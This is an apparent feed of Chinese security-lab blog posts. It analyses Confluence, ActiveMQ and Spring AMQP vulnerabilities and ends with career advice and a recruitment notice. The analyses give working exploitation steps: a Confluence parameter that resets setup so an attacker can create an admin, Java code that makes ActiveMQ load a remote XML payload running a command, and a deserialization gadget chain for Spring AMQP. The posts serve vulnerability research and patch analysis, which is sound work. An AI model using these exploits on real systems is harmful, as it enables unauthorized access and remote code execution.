这样的逻辑就存在缺陷，如果以非/admin/开头去访问实际需要 admin 权限、但又没有添加@WebSudoRequired注解的 action，就可以成功绕过matches()的校验。

根据官方公告里提到的三条利用路径分析，这三个 action 都属于setup包，应该通过/setup/xxx.action访问才对；

/json/setup-restore.action          /json/setup-restore-local.action          /json/setup-restore-progress.action

请求/setup/setup-restore.action会显示已经完成安装了；

但是struts.xml中使用了 package 继承，json继承于admin继承于setup，也就是说通过/json/和/admin/也可以访问/setup/下的 action；

在未登录状态下请求/admin/setup-restore.action会跳转到登录页面，在登录状态下请求会进行二次登录校验；

而在未登录状态下请求/json/setup-restore.action则能成功访问，SetupRestoreAction 只能通过 POST 请求；

可以看到，/json/setup-restore.action不仅访问到了/setup/下的 action，还绕过了DefaultWebSudoManager.matches()的二次校验。

所以在修复版本当中，就为大多数 action 都添加了@WebSudoRequired，无差别进行二次校验。

4-2. 权限校验2

还有一个权限校验的点在 PermissionCheckInterceptor，其中调用了ConfluenceActionSupport.isPermitted()，如果返回为 true，则表示允许访问；

ConfluenceActionSupport.isPermitted()中，先判断了服务是否已经安装完成，这是肯定的，看 else 分支；
如果 skipAccessCheck 为 true，则略过 if 分支，后面就是返回 true；

不过 skipAccessCheck 默认值为 false，所以调用ConfluenceActionSupport.isPermitted()方法的都会报“没有权限”。

但是重写了isPermitted()方法的、使其返回 true 的 action，就不受限制，例如 SetupRestoreAction 中重写了isPermitted()直接返回 true。

还有就是 ConfluenceActionSupport 中存在setSkipAccessCheck()方法，可以通过修改 skipAccessCheck 为 true 来绕过；

例如，admin 包下的viewlanguage.action，使用了PermissionCheckInterceptor 拦截器，ConfigureLanguageAction 中没有重写isPermitted()方法；

未登录状态下，直接访问/json/viewlanguage.action会跳转到登录页面，添加?skipAccessCheck=true则能成功访问。

所以两种情况能绕过 PermissionCheckInterceptor 校验：

重写isPermitted()方法，使其返回为 true；
不重写isPermitted()方法，修改 skipAccessCheck 为true。

4-3. 备份文件

下载坑点（错误操作）：

在“备份与恢复”页面创建并下载备份文件，选择备份站点，返回类型也为SITE；

然后修改用户密码，退出登录，POST 请求/json/setup-restore.action进行上传，却报错说我们试图在还原一个空间备份，但是我们明明就备份的是站点。

看看代码，英文版报错内容在SetupRestoreAction.validate()中出现，进入条件是exportScope类型不为ALL，而我们的备份文件中是jobScope且值为SITE，不在一个频道，自然会报错。

所以应该找一个exportScope为ALL的备份点。

下载正确操作：

从/admin/backup.action导出备份文件；

在BackupAction.execute()中，调用的runLegacyVersion()把exportScope设为了 ALL，所以能避开上面的报错。

再进行上传，把synchronous改为 true，直接同步完成覆盖，如果不改为 true，虽然返回显示成功，但是并不能使用备份中的密码去登录。

在SetupRestoreAction.execute()中调用了父类的execute()，到 AbstractImportAction 中，isImportAllowed()恒返回 true，调用doRestore();

在doRestore()中判断了synchronous的值，如果为 true 则直接执行当前任务，进行备份覆盖。
synchronous默认为 false，不修改则返回一个 taskId;

还需要通过/longrunningtaskxml.action?taskId=去执行这个任务，调用this.executorService.submit()提交并执行。

参考链接：

https://xz.aliyun.com/t/12961
https://xz.aliyun.com/t/12981
5pringKi11：CVE-2023-22518 Critical Privilege Escalation Vulnerability in Atlassian's Confluence.pdf

阅读原文

跳转微信打开

Confluence 数据中心和服务器中的访问控制漏洞(CVE-2023-22515)

Thu, 30 Nov 2023 12:15:00 +0800

原创元亨-blckder02 2023-11-30 12:15 浙江

外部攻击者可能利用可公开访问的 Confluence 数据中心和服务器实例中的先前未知的漏洞来创建未经授权的 Confluence 管理员帐户并访问 Confluence 实例。

1. 前言

官方公告：
https://confluence.atlassian.com/security/cve-2023-22515-broken-access-control-vulnerability-in-confluence-data-center-and-server-1295682276.html

漏洞描述：
外部攻击者可能利用可公开访问的 Confluence 数据中心和服务器实例中的先前未知的漏洞来创建未经授权的 Confluence 管理员帐户并访问 Confluence 实例。

影响版本：

< 8.0.5
< 8.1.5
< 8.2.4
< 8.3.3
< 8.4.3
< 8.5.2

8.0.0版本之前不受影响。

2. 环境搭建

从 atlassian 官网下载漏洞版本的 confluence 安装包，Windows 下载 exe 进行安装；
https://www.atlassian.com/software/confluence/download-archives

启动 confluence 服务后，访问http://localhost:8090进入安装步骤，选择Trial Installation；

需要申请一个许可证，点击Get an evaluation license，选择Confluence (Data Center)，获取一个免费试用的许可证，复制过来；

然后选择“非集群”，进入创建数据库的步骤；MySQL 数据库需要单独下载驱动；

点击下载地址，选择最新的驱动版本下载；

然后将下载的mysql-connector-j-8.2.0.jar复制到/Atlassian\Confluence\confluence\WEB-INF\lib目录下，重启 Confluence 服务即可配置 Mysql。

需要修改一些 mysql 的配置参数，参考官方 MySQL 数据库配置：https://confluence.atlassian.com/doc/database-setup-for-mysql-128747.html

一直跟着按照流程走就是，选择Empty Site；

创建管理员；

安装成功。

参考链接：

https://andblog.cn/2655
https://l4yn3.github.io/2019/04/20/Confluence-漏洞分析环境搭建/

3. 漏洞分析

diff 一下 confluence 8.5.1 和 8.5.2 的 jar 包，可以看到删除了SeverInfoAction.class和ServerInfoFilter.class，新增了ReadOnlyApplicationConfig.class和ReadOnlySetupPersister.class；

两个 ReadyOnly 的类中，都对 setter 方法抛出了 UnsupportedOperationException 异常，字面意思就是不允许的操作异常；

ReadOnlyApplicationConfig 和 ReadOnlySetupPersister 用在了 BootstrapStatusProviderImpl.class 中的getApplicationConfig()和getSetupPersister()，猜测漏洞应该是跟 applicationconfig 和 setuppersister 变量有关。

根据官方公告的漏洞描述，利用漏洞可以创建未经授权的 Confluence 管理员账户，而创建管理员账户的步骤就在安装过程中进行的；

对应的 action 地址是/setup/setupadministrator.action，由于我们已经安装过了，直接访问就会显示Setup is already complete；

在\confluence\WEB-INF\lib\com.atlassian.confluence_confluence-8.5.1.jar!\com\atlassian\confluence\core\ConfluenceActionSupport.propertie中，Setup is already complete这个字符串信息是赋给了setup.already.title变量；
而在\setup\alreadysetup.vm中使用了这个变量；

在 struts.xml 中看到，alreadysetup.vm是 alreadysetup 结果的返回页面；

在 SetupCheckInterceptor 拦截器中，存在返回 alreadysetup 的情况，前面两个方法结果都为 true 就返回 alreadysetup。

先看一下isSetupComplete()方法，也就是说，这个方法的返回结果是跟bootstrapStatusProvider.applicationConfig.setupComplete变量值相关的，安装完成后这个值就为 true。

那么如果能把bootstrapStatusProvider.applicationConfig.setupComplete的值改为 false，就可以重新进行安装步骤，从而创建新的管理员账户了。

看看新版本中被删除的 ServerInfoAction，好像没什么问题；

再看看它的父类，ConfluenceActionSupport 有一个getBootstrapStatusProvider()方法，看名字有点用的感觉，其中实例化了BootstrapStatusProviderImpl 类；

跟进，在 BootstrapStatusProviderImpl 中有一个getApplicationConfig()，而 ApplicationConfig 中有setSetupComplete()，如果能调用这些 gettet/setter 方法，就成功了。

所以，要寻找能够调用getBootstrapStatusProvider().getApplicationConfig().setSetupComplete(false)的地方。

4. 漏洞复现

根据 Struts2 框架下 XWork 的特性，可以直接通过 HTTP 参数调用对象的 gettet/setter 方法；
向 URL 中传入参数/server-info.action?bootstrapStatusProvider.applicationConfig.setupComplete=false，返回 success；
再访问/setup/setupadministrator-start.action，就可以重新创建管理员账号了。

继承了 ConfluenceActionSupport 的 action 类都可以进行利用，只是请求方法有的有些不同。

参考链接：

https://cn-sec.com/archives/2177640.html
https://exp10it.cn/2023/10/atlassian-confluence-cve-2023-22515-分析/

阅读原文

跳转微信打开

Apache ActiveMQ RCE 分析 (CNVD-2023-69477 / CVE-2023-46604)

Mon, 27 Nov 2023 17:22:00 +0800

原创 blckder02 2023-11-27 17:22 浙江

ActiveMQ对传入的TCP数据没有进行校验。攻击者可构造特殊数据流在服务端加载任意类，最终能直接执行任意命令。

1. 前言

官方公告：
https://activemq.apache.org/news/cve-2023-46604
https://nvd.nist.gov/vuln/detail/CVE-2023-46604

漏洞描述：
ActiveMQ 对传入的 TCP 数据没有进行校验。攻击者可构造特殊数据流在服务端加载任意类，最终能直接执行任意命令。

影响版本：
Apache ActiveMQ：
    < 5.15.16
    < 5.16.7
    < 5.17.6
    < 5.18.3

ActiveMQ 简介：
Apache ActiveMQ 是一个开源的消息中间件，实现了 Java Message Service (JMS) 规范。它是 Apache 软件基金会的项目之一，用于实现高性能、可扩展、松耦合的消息传递系统。

在 ActiveMQ 中，生产者（Producer）发送消息到 Queue 或者 Topic 中，消费者（consumer）通过 ActiveMQ 支持的传输协议连接到 ActiveMQ 接受消息并做处理。

2. 环境搭建

2-1. 搭建ActiveMQ服务

在官网下载压缩包：
https://activemq.apache.org/download-archives

解压后进入 bin 目录，activemq start启动服务；

访问http://127.0.0.1:8161/，默认用户名/密码为admin/admin，进入管理页面，搭建成功。
ActiveMQ 默认情况下使用了 OpenWire 协议，而 OpenWire 协议是基于二进制的，面向网络的协议，通常通过 TCP 进行通信，默认监听 61616 端口。

关于管理页面的介绍可参考：
https://blog.csdn.net/csdndys/article/details/130505328

2-2. 创建Demo

创建一个 Spring Boot 项目，选择 activemq 依赖；

或者手动添加，不过会有 log4j 冲突，比较麻烦。

    org.apache.activemq    activemq-all    5.17.5

或者新建空项目，添加如下依赖，比较靠谱。

    org.apache.activemq    activemq-spring    5.18.2

当前测试环境版本：

Spring Boot 版本：2.7.5
对应ActiveMQ版本：5.16.5
JDK 11

resources 目录下创建配置文件log4j.xml：

"1.0" encoding="UTF-8"?>"log4j.dtd">"http://jakarta.apache.org/log4j/">        "console" class="org.apache.log4j.ConsoleAppender">        "Target" value="System.out" />        class="org.apache.log4j.PatternLayout">            "ConversionPattern" value="%-5p %d{yyyy-MM-dd HH:mm:ss} [%t] %c{1} - %m%n" />                                value="debug" />        ref ref="console" />

写一个与 ActiveMQ 服务器发送消息的 Demo ；

import org.apache.activemq.ActiveMQConnectionFactory;import javax.jms.*;public class ActiveMQDemo {    public static void main(String[] args) {        //连接 ActiveMQ 服务器        String url = "tcp://127.0.0.1:61616";        ConnectionFactory connectionFactory = new ActiveMQConnectionFactory(url);        Connection connection =  null;
        try {            connection = connectionFactory.createConnection();            connection.start();            //创建会话            Session session = connection.createSession(false, Session.AUTO_ACKNOWLEDGE);            //创建队列            Destination destination = session.createQueue("myQueue");            //创建消息生产者            MessageProducer producer = session.createProducer(destination);            //创建消息            ObjectMessage objectMessage = session.createObjectMessage("123");//            TextMessage textMessage = session.createTextMessage("123");            //发送消息            producer.send(objectMessage);            System.out.println("Message Sent: " + objectMessage.getObject());            //创建消息消费者            MessageConsumer consumer = session.createConsumer(destination);            //接收消息            Message receviedMessage = consumer.receive();            if (receviedMessage instanceof ObjectMessage) {                ObjectMessage message = (ObjectMessage) receviedMessage;//                TextMessage message = (TextMessage) receviedMessage;                System.out.println("Recevied message: " + message.getObject());            }                      //关闭会话            session.close();        } catch (JMSException e) {            throw new RuntimeException(e);        } finally {            if (connection != null) {                try {                    connection.close();                } catch (JMSException e) {                    e.printStackTrace();                }            }        }    }}

运行，控制台可以看到信息输出，管理页面也有消息记录。

3. 流程分析

在BaseDataStreamMarshaller.createThrowable()中，根据传入的的类名和消息，实例化并返回了一个 Throwable 类型的对象；
搜索发现，在tightUnmarsalThrowable()和looseUnmarsalThrowable()中都调用createThrowable()方法；

再搜索，找到 ExceptionResponseMarshaller 、ConnectionErrorMarshaller 、MessageAckMarshaller 中的tightUnmarshal()和looseUnmarshal()方法分别调用了tightUnmarsalThrowable()和looseUnmarsalThrowable()；

以 ExceptionResponseMarshaller 为例，其中的这两个方法是对 ExceptionResponse 对象进行序列化、反序列化操作，当处理 ExceptionResponse 类型消息时就会触发 ExceptionResponseMarshaller 中的方法。

在发送消息的时候，会将消息类型对象作为参数传递给ActiveMQConnection.syncSendPacket()，一直传递到TcpTransport.oneway()，调用哪个oneway()是由this.transport变量决定的；

然后调用OpenWireFormat.marshal()进行序列化，这里会根据type的值来选择处理器的类型；

而type的值是跟收到的消息类型有关，这里消息类型是 ObjectMessage ，对应 ActiveMQObjectMessage，type值为26，那么调用的就是 ActiveMQObjectMessageMarshaller 。

然后在处理消息的时候会调用到OpenWireFormat.doUnmarshal()进行反序列化，这里原理和序列化时一样。

所以目的就是要构造一个 ExceptionResponse、ConnectionError 或 MessageAck 类型的消息。

4. 漏洞复现

new 一个 ExceptionResponse 类型对象，给它抛出一个 ClassPathXmlApplicationContext 异常，使其从指定路径加载恶意代码；
然后直接调用ActiveMQSession.syncSendPacket()，将 ExceptionResponse 消息作为参数发送给 ActiveMQ 服务器，即可触发。

public class ActiveMQDemo {    public static void main(String[] args) throws Exception {        ConnectionFactory connectionFactory = new ActiveMQConnectionFactory("tcp://localhost:61616");        Connection connection = connectionFactory.createConnection();        connection.start();
        ActiveMQSession session = (ActiveMQSession) connection.createSession();
        ExceptionResponse exceptionResponse = new ExceptionResponse();        exceptionResponse.setException(new ClassPathXmlApplicationContext("http://127.0.0.1:8081/poc.xml"));        session.syncSendPacket(exceptionResponse);
        connection.close();    }}

需要重新定义org.springframework.context.support.ClassPathXmlApplicationContext，使其继承 Throwable。

package org.springframework.context.support;       public class ClassPathXmlApplicationContext extends Throwable{    private String message;           public ClassPathXmlApplicationContext(String message) {        this.message = message;    }
    @Override    public String getMessage() {        return message;    }}

或者直接调用oneway()方法，将消息对象作为参数传给他。

前面说了，oneway()方法的选择是跟this.transport有关，而AvtiveMQObjectMessage.getTransportChannel()方法就是获取当前的this.transport；

new 一个 ExceptionResponse 类型对象，同样给它抛出 ClassPathXmlApplicationContext 异常。

//ExceptionResponseObject msg = new ExceptionResponse(new ClassPathXmlApplicationContext("http://127.0.0.1:8081/poc.xml"));((ActiveMQConnection) connection).getTransportChannel().oneway(msg);

同理 ConnectionError 利用：

//ConnectionErrorThrowable o = new ClassPathXmlApplicationContext("http://127.0.0.1:8081/poc.xml");ConnectionError msg = new ConnectionError();msg.setConnectionId(new ConnectionId());msg.setException(o);((ActiveMQConnection) connection).getTransportChannel().oneway(msg);

MessageAck 利用：

//MessageAckMessageAck msg2 = new MessageAck();msg2.setPoisonCause(new ClassPathXmlApplicationContext("http://127.0.0.1:8081/poc.xml"));((ActiveMQConnection) connection).getTransportChannel().oneway(msg2);

poc.xml 内容是弹计算器：

<beans xmlns="http://www.springframework.org/schema/beans"   xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"   xsi:schemaLocation=" http://www.springframework.org/schema/beans http://www.springframework.org/schema/beans/spring-beans.xsd">    <bean id="pb" class="java.lang.ProcessBuilder" init-method="start">        <constructor-arg >        <list>            <value>calc.exevalue>        list>        constructor-arg>    bean>beans>

5. 补丁分析

https://github.com/apache/activemq/pull/1098/commits/3eaf3107f4fb9a3ce7ab45c175bfaeac7e866d5b

在createThrowable()方法中新增了validateIsThrowable()校验；
validateIsThrowable()的作用是判断获取到的类是否是 Throwable 的子类。

参考链接：

https://exp10it.cn/2023/10/apache-activemq-版本-5.18.3-rce-分析/
http://www.lvyyevd.cn/archives/apacheactivemqrce-fen-xi
https://www.ctfiot.com/141159.html
http://www.hackdig.com/10/hack-1132519.htm

阅读原文

跳转微信打开

Spring AMQP 反序列化漏洞分析(CVE-2023-34050)

Thu, 23 Nov 2023 11:52:00 +0800

原创 blckder02 2023-11-23 11:52 浙江

Spring AMQP 中添加了可反序列化类名的允许列表模式，允许用户锁定来自不受信任来源的消息中数据的反序列化；但是默认情况下，当未提供允许的列表时，所有类都可以反序列化。

1. 前言

官方公告：
https://spring.io/security/cve-2023-34050

漏洞描述：

2016 年，Spring AMQP 中添加了可反序列化类名的允许列表模式，允许用户锁定来自不受信任来源的消息中数据的反序列化；但是默认情况下，当未提供允许的列表时，所有类都可以反序列化。

利用条件：

使用 SimpleMessageConverter 或 SerializerMessageConverter
用户未配置允许列表模式
不受信任的消息发起者获得将消息写入 RabbitMQ 代理以发送恶意内容的权限

影响版本：

Spring AMQP：

· 1.0.0 到 2.4.16

· 3.0.0 到 3.0.9

Spring Boot 2.7.17、3.0.12、3.1.5、3.2.0版本之前。

修复建议：

不允许不受信任的来源访问 RabbitMQ 服务器
版本低于 2.4.17 的用户应升级到 2.4.17
使用版本 3.0.0 至 3.0.9 的用户应升级到 3.0.10

简介：

AMQP（Advanced Message Queuing ，高级消息队列协议）是一种使用广泛的独立于语言的消息协议，它定义了一种二进制格式的消息流，任何编程语言都可以实现该协议。实际应用最广泛的 AMQP 服务器是 RabbitMQ 。

2. 环境搭建

创建一个 Spring Boot 项目，引入图中几个模块。

也可以手动添加 spring-rabbit 依赖：

<dependency>            <groupId>org.springframework.amqpgroupId>              <artifactId>spring-rabbitartifactId>                <version>2.4.16version>                dependency>

这里使用的 Spring Boot 版本是 2.7.16，对应的 Spring AMQP 版本是 2.4.16；
导入 commons-beanutils 依赖，作为可利用的反序列化链。

<dependency>              <groupId>commons-beanutilsgroupId>                <artifactId>commons-beanutilsartifactId>                  <version>1.9.1version>                dependency>                                   <dependency>                      <groupId>org.javassistgroupId>                        <artifactId>javassistartifactId>                          <version>3.28.0-GAversion>                        dependency>

需要起一个 RabbitMQ 服务，使用 docker 搭建，执行如下命令：

docker run -d --name my-rabbit -p 5672:5672 -p 15672:15672 rabbitmq:3-management

docker ps看到启动后的信息；

访问对应端口，默认用户名/密码是guest/guest，登录则可以看到 RabbitMQ 管理页面。

然后在 Spring Boot 中配置 RabbitMQ 服务的IP、端口、用户名、密码；

spring.rabbitmq.host=192.168.xxx.xxx          spring.rabbitmq.port=5672          spring.rabbitmq.username=guest          spring.rabbitmq.password=guest          server.port = 8081

写一个配置类，自定义一个myQueue队列和myExchange交换机，并且绑定myExchange和myQueue，使myExchange交换机接收到的消息发送到myQueue队列；

import org.springframework.amqp.core.*;          import org.springframework.context.annotation.Bean;          import org.springframework.context.annotation.Configuration;          
@Configuration          public class RabbitConfig {              //自定义队列              @Bean              public Queue MyQueue() {                  return new Queue("myQueue", true);              }              //自定义交换机              @Bean              public DirectExchange MyExchange() {                  return new DirectExchange("myExchange");              }            //绑定交换机和队列              @Bean              public Binding binding() {                  return BindingBuilder.bind(MyQueue()).to(MyExchange()).with("blckder02");              }          }

在管理页面可以看到创建的交换机和队列，以及绑定信息；如果代码绑定不成功，就手动在管理页面绑定。

写一个发送消息的方法，其中routingKey字段要和上面绑定交换机和队列处with("blckder02")一致，这里都设为blckder02；

import org.springframework.amqp.rabbit.core.RabbitTemplate;   import org.springframework.beans.factory.annotation.Autowired;  import org.springframework.stereotype.Service;          
@Service          public class MessageSenderService {              private final RabbitTemplate rabbitTemplate;             @Autowired              public MessageSenderService(RabbitTemplate rabbitTemplate) {                  this.rabbitTemplate = rabbitTemplate;              }                  public void sendMessage (Object message) {                  rabbitTemplate.convertAndSend("myExchange", "blckder02", message);                  System.out.println("Message Sent Success");              }          }

再写一个监听myQueue队列的方法，使用@RabbitListener指定要监听的队列名称；

import org.springframework.amqp.rabbit.annotation.RabbitListener;          import org.springframework.stereotype.Service;                    @Service          public class MyService {                        @RabbitListener(queues = "myQueue")              public void recevie(Object result) {                  System.out.println("监听到消息了");                  System.out.println(result);              }          }

简单写一个 Controller 测试一下服务搭建是否成功；

@RestControllerpublic class MessageController {
    private final MessageSenderService messageSenderService;    @Autowired    public MessageController(MessageSenderService messageSenderService) {         this.messageSenderService = messageSenderService;     }        @GetMapping("/testsend")    public void testsendMessage (Object message)  {        messageSenderService.sendMessage("Hello RabbitMQ!");    } }

下断点慢慢执行，就可以看见队列中的消息数量，执行太快的话消息很快就处理完了，就不会显示；
能显示则说明服务搭建成功。

3. poc构造

先准备一个 CommonBeanutils 的反序列化链的 templatesImpl 对象，抛出AmqpRejectAndDontRequeueException异常，避免陷入死循环；

public class CommonBeanutils1 {              public static TemplatesImpl createTemplatesImpl(String cmd) {                  try {                      TemplatesImpl templates = TemplatesImpl.class.newInstance();                             ClassPool pool = ClassPool.getDefault();                      pool.insertClassPath(new ClassClassPath(AbstractTranslet.class));                      CtClass cc = pool.makeClass("Cat");                      String cmdSrc = String.format("try { java.lang.Runtime.getRuntime().exec(\"" + cmd + "\"); throw new org.springframework.amqp.AmqpRejectAndDontRequeueException("err"); } ");                      cc.makeClassInitializer().insertBefore(cmdSrc);                      String randomClassName = "Calc" + System.nanoTime();                      cc.setName(randomClassName);                      cc.setSuperclass(pool.get(AbstractTranslet.class.getName()));
            setField(templates, "_name", "name");                      setField(templates,"_bytecodes",new byte[][]{cc.toBytecode()});                      setField(templates, "_tfactory", new TransformerFactoryImpl());                      setField(templates, "_class", null);               return templates;                  } catch (Exception e) {            e.printStackTrace();             return null;         }     }     public static void setField(Object object,String field,Object args) throws Exception{                  Field f0 = object.getClass().getDeclaredField(field);                  f0.setAccessible(true);        f0.set(object,args);     }          }

在 Controller 中定义发送消息的方法，templates 需要用一个可被序列化的类包裹，POJONode依次继承于ValueNode -> BaseJsonNode并实现Serializable接口；
但是 POJONode 是 Jackson 包中的类，由于 Jackson 反序列化链不稳定，所以需要构造一个 JdkDynamicAopProxy 类的代理类，以保证稳定调用TemplatesImpl#getOutputProperties()；
而将 POJONode 对象赋给 BadAttributeValueExpException 对象的val值，则是为了通过BadAttributeValueExpException.readObject()调用POJONode.toString()，从而调用到TemplatesImpl#getOutputProperties()。

@GetMapping("/send") public void sendMessage (Object message) throws Exception {              TemplatesImpl templates = CommonBeanutils1.createTemplatesImpl("calc.exe");                            AdvisedSupport as = new AdvisedSupport();    as.setTarget(templates);     Constructor constructor = Class.forName("org.springframework.aop.framework.JdkDynamicAopProxy").getDeclaredConstructor(AdvisedSupport.class);              constructor.setAccessible(true);     InvocationHandler jdkDynamicAopProxyHandler = (InvocationHandler) constructor.newInstance(as);
    Templates templatesProxy = (Templates) Proxy.newProxyInstance(ClassLoader.getSystemClassLoader(), new Class[]{Templates.class}, jdkDynamicAopProxyHandler);                        POJONode pojoNode = new POJONode(templatesProxy);     BadAttributeValueExpException poc = new BadAttributeValueExpException(null);    CommonBeanutils1.setField(poc, "val", pojoNode);
    messageSenderService.sendMessage(poc);}

还有一个重要的点，就是重新定义com.fasterxml.jackson.databind.node .BaseJsonNode，并且删除writeReplace()方法，这样就不会出现java.lang.NullPointerException。具体原因文末细说。

运行看看，成功执行命令，并且消息中能看到传递的 poc 。

4. 调试分析

直接跟进RabbitTemplate.conveAndSend()，先将消息转换为Message类型，调用的消息转换器是默认的SimpleMessageConverter；

在进行toMessage()时会调用createMessage()，这里面会判断传入消息对象的类型，这里 BadAttributeValueExpException 对象是实现了 Serializable 接口的，所以将对象进行序列化，并且把 content-type 类型设为application/x-java-serialized-object，然后返回 Message 对象；

然后将 Message 发送到 Rabbit 服务；

在监听接收消息时，会调用SimpleMessageConverter.fromMessage()，判断了 content-type 类型符合application/x-java-serialized-object，于是调用SerializationUtils.deserialize()对 message 进行反序列化；

在 SimpleMessageConverter 中重写了CodebaseAwareObjectInputStream#resolveClass()方法，调用了checkAllowedList()对反序列化的类进行校验；

然而allowedListPatterns默认为空，并没有起到白名单校验的作用，就导致任意类都允许被反序列化；

最后看到熟悉的触发点。

5. 补丁分析

补丁地址：https://github.com/spring-projects/spring-amqp/compare/v2.4.16...v2.4.17?diff=split

Spring AMQP 2.4.17 相较于 2.4.16 版本新增了环境变量SPRING_AMQP_DESERIALIZATION_TRUST_ALL和 JVM 属性spring.amqp.deserialization.trust.all，只有两个值都为 true时， TRUST_ALL变量才为 true；

在checkAllowedList()方法中也是增加了对TRUST_ALL的判断。

6. 踩的坑

因为对 AMQP 不是很熟悉，试错了好多次才勉强复现出来。

1.删除 BaseJsonNode.writeReplace

使用原本的 BaseJsonNode 的话，在发送消息序列化的时候会调用BaseJsonNode.writeReplace()，最后也会调用TemplatesImpl.getOutputProperties()触发命令执行；

但是这里触发后会报错NullPointerException，导致消息传递中断。

删除掉BaseJsonNode.writeReplace()就调用的是UnmodifiableRandomAccessList.writeReplace()，消息能继续传递。

2.Jackson 反序列化链不稳定

可以学习这篇文章：https://xz.aliyun.com/t/12846

3. 抛出 org.springframework.amqp.AmqpRejectAndDontRequeueException异常

因为在执行 CommonBeanutils 链时必然会出现报错，导致消息处理不成功，就会让消息重新排队处理，然后又报错，陷入死循环。

抛出这个异常可以避免无限次地重试失败的消息，节约系统资源。

4. 消息未处理，删除队列

由于消息处理失败，还是会留存在队中，处于unacked状态，当测试程序再次启动时，就会优先处理队列中留存消息。

所以在复现过程中如果队列中还留存有上一次测试的消息，可以把队列删除重新创建。

参考链接：

https://exp10it.cn/2023/10/spring-amqp-反序列化漏洞-cve-2023-34050-分析/
https://boogipop.com/2023/04/24/AliyunCTF 2023 WriteUP/
https://blog.csdn.net/qq_43655835/article/details/106827158

阅读原文

跳转微信打开

给应届安全研究员的一些建议

Thu, 31 Aug 2023 09:30:00 +0800

原创毁三观大人 2023-08-31 09:30 山东

安全行业是一个竞争非常激烈的领域，在这样的环境下，外界的评价和业界标准往往会影响我们对自己能力的认知。

引言：面试官与应届生的对话

最近在招人，面了一些应届生或准应届生。在面试的最后，我经常会问，有什么想问我的吗？这次比较有意思，候选人大部分都问，请问我该怎么继续学、我还有什么地方需要加强或你对我有什么建议吗？

安全研究员的困境与误解

不知道什么时候开始，现在的安全研究员有点不太敢想了。也有人可能说，这是因为现在网络比之前安全了，导致安全研究员怂了。但是从我自身观察，网络可能没有变得更加安全，在大家看不见的地方，各类安全事件还是频繁发生。这也反映了一个问题，那就是安全研究员不能仅仅依赖于外界的评价、预期来判断自己的能力和潜力。在我对我们实验室新人培养的时候，我从来不会跟他说这个工作有多难，而是说业务的细节，这也让我成功引导我们的应届生毕业论文选择了rasp这个方向，如果我开始就说了rasp有多难，那他们自己就先打退堂鼓了。

安全行业是一个竞争非常激烈的领域，在这样的环境下，外界的评价和业界标准往往会影响我们对自己能力的认知。因此，除了关注这些评价和标准，更重要的是要有自己可靠的信心来源。例如，我个人更看重在数据分析方面能够得出的直接和有用的结果，而不是过分依赖他人的评价。

个人经验

在大学快毕业的时候，我曾经给自己定了一些目标，例如入侵topX以内的所有公司。为什么我要这么做呢，因为那个时代，只有入侵才能证明一个人的能力，如果我没能力入侵xxx，那你怎么说我是一名黑客呢？当然，入侵的这些地方，漏洞我都交给他们的src了><。这样的目标设定，虽然现在看起来有些极端，但它至少给了我一个明确的方向和激励，让我知道要朝哪个方向努力。

超越表面：真正的能力标准

也有人会说，挖洞吗？谁都会挖。我当然定的不是这种水货目标，我定的是打到内网，拿到核心数据，这才算完。

从雇主角度看应届生

回到给应届安全研究员建议的这个问题上。如果真的想让别人刮目相看，你至少得整点狠活。狠活，如果不知道什么是狠活，那就自己收集一些近年来各大安全会议的ppt，选一些自己觉得很牛的当作狠活的参考。当然，狠活不仅仅是技术层面的，还包括如何与团队合作，如何高效解决问题，以及如何在压力下保持冷静。

工作需求与市场

在面试官，用人单位的角度来讲，招人实际上在做某种工作的补充。拿安卓逆向来说，某些公司招聘这个岗位往往是为了进行竞品分析。具体来说，他们想通过逆向工程来了解竞争对手的产品特性和优缺点。更深层次是要监控自己的服务商在签了2选1协议以后，是不是跑到友商又赚福利去了。

所以这个工作，除了考察应聘者在逆向工程上的广度，例如潜在竞品、优势竞品和直接竞品的应用逆向能力，也会重点考察他们对能力深厚的直接竞品防御体系的对抗能力。通俗来讲，你能不能在出问题的时候迎头而上。这也意味着，作为应届生，你不仅需要有技术能力，还需要了解业务逻辑和市场需求，这样才能更好地融入团队和公司。

很多公司招人的时候，都会写有XXX排名、CVE编号、XXX证书等优先，这个其实在服务市场行为。如果大家分析过安全行业的招标文件，你们就可以发现，CVE编号也可以成为一个招标参数。CISP、PMP、CISSP、OSCP四证合一的项目经理正成为安全行业招标参数中的天选之子。工作，要服务与市场，市场要什么，工作也要做什么。如果说你是做web的，我在招二进制，咱们俩肯定不会产生什么共鸣，你也会有面试挫败感。

资格证书可能是一个加分项，但它绝不是决定因素。雇主更看重的是你能为公司带来什么具体的价值，你在过去的项目中有何表现，以及你的问题解决能力如何。资格证书可能能帮你打开面试的大门，但走进去之后，你需要用你的实际能力来证明自己。

让自己在面试中更加出色

面试不仅是公司评价你的机会，也是你展示自己的平台。面试时问的问题，可能就是你以后的工作。对于我来说，学习是第一位，所以我经常问一个人怎么学习。其实这是在考察你的学习能力上限。如果一个人只是看看安全咨询网站，他接触的可能都是二手信息。如果一个人加了漏洞百出、代码审计、赛博回忆录等知识星球，他就可以接触到一手的安全信息。如果一个人英语很好，跟安全研究员们谈笑风生，那他可能就是一手信息的来源。所以，记住，面试考察的不仅仅是技术能力。

还有就是，我建议候选人更直接一点，直接问面试官现在有什么难题需要解决。因为我每次换工作都是这么换的，有没有需要解决的难题，没有难题让我解决我也不想来。

总结

在这个快节奏的时代，不仅要有出色的技术能力，还要能快速适应不断变化的市场需求和业务环境。拿到面试的机会是第一步，如何让面试官记住你，并确信你能为公司带来价值，才是关键。

最后，有兴趣的可以关注下方的招聘信息。

阅读原文

跳转微信打开

中孚信息秋季人才招聘｜元亨实验室等你来

Wed, 23 Aug 2023 19:38:00 +0800

元亨实验室 2023-08-23 19:38 四川

阅读原文

跳转微信打开